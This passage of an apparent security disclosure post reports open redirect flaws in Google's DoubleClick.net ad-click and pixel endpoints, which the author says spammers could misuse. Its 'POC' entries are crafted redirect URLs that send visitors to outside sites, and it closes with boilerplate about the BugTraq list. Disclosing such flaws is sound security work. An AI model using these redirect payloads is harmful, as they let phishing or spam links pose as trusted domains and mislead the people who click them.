<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.googleadservices.com/pagead/aclk?sa=L&ai=C6w2J2VL1UtqeFtPFsQe_xICACOur9I0Gm4qOwXKd4q7LvAEQAiC4TygCUPrp_p7______wFgvwWgAY2TjcoDyAEBqQJGONe13HWqPqoEIk_QksMhB61R5_EBc-rRl0G3mUtOQjLemb4NjAETa6dj-AGAB9vs8jWQBwE&num=2&val=ChA5MDRhYzc4NjJiNjFlMzZlEO6g15cFGgjqLoQCBAXi2SABKAAw6sfV44GF7cZ_OMbI1ZcFQMbI1ZcF&sig=AOD64_1g--5hg2Tc0L5irweEKYqbh1FwSw&adurl=https://www.singtelshop.com/mobile/phone-details.jsf%3FbrandId%3D122%26modelId%3DZ10" style="background-color: white;" target="_blank">http://www.googleadservices.<wbr></wbr>com/pagead/aclk?sa=L&ai=<wbr></wbr>C6w2J2VL1UtqeFtPFsQe_<wbr></wbr>xICACOur9I0Gm4qOwXKd4q7LvAEQAi<wbr></wbr>C4TygCUPrp_p7______<wbr></wbr>wFgvwWgAY2TjcoDyAEBqQJGONe13HW<wbr></wbr>qPqoEIk_QksMhB61R5_EBc-<wbr></wbr>rRl0G3mUtOQjLemb4NjAETa6dj-<wbr></wbr>AGAB9vs8jWQBwE&num=2&val=<wbr></wbr>ChA5MDRhYzc4NjJiNjFlMzZlEO6g15<wbr></wbr>cFGgjqLoQCBAXi2SABKAAw6sfV44GF<wbr></wbr>7cZ_OMbI1ZcFQMbI1ZcF&sig=<wbr></wbr>AOD64_1g--<wbr></wbr>5hg2Tc0L5irweEKYqbh1FwSw&<wbr></wbr>adurl=https://www.singtelshop.<wbr></wbr>com/mobile/phone-details.jsf%<wbr></wbr>3FbrandId%3D122%26modelId%<wbr></wbr>3DZ10</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.2) Vulnerable URLs Related to DoubleClick.net.</b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 1:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://<wbr></wbr>noteok.zdnet.com.cn/notebook/<wbr></wbr>2013/1113/2995493.shtml</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://www.<wbr></wbr>inzeed.com/kaleidoscope/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://www.<wbr></wbr>tetraph.com/security</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 2:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>275260754;102106837;b?http://<wbr></wbr>zerodistance.cio.com</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;276304929;103445101;w?http://tracker.marinsm.com/rd" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>276304929;103445101;w?http://<wbr></wbr>tracker.marinsm.com/rd</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>275260754;102106837;b?http://<wbr></wbr>www.inzeed.com/kaleidoscope/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>276304929;103445101;w?http://<wbr></wbr>www.tetraph.com/security</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 3:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1OTI4NzkxMzM3&<wbr></wbr>forward=http%3A%2F%2Fib.adnxs.<wbr></wbr>com</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http%3A%2F%2Fwww.reuters.com%" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1ODY0NDM1NzM2&<wbr></wbr>forward=http%3A%2F%2Fwww.<wbr></wbr>reuters.com%</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1OTI4NzkxMzM3&<wbr></wbr>forward=http://www.inzeed.com/<wbr></wbr>kaleidoscope/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1ODY0NDM1NzM2&<wbr></wbr>forward=http://www.tetraph.<wbr></wbr>com/security</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">...</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">We can see that Google DoubleClick.net has Open Redirect vulnerabilities and could be misused by spammers.</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.3)</b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC Video:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=lfKHVGHWvk8&feature=youtu.be" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=lfKHVGHWvk8&feature=youtu.be</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Several 0-day vulnerabilities in other, similar products have been found by other bug hunters before. Google has patched some of them. BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The following may be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with the above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of the following web security issues have been published here: Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection, Phishing, Cross-site scripting, 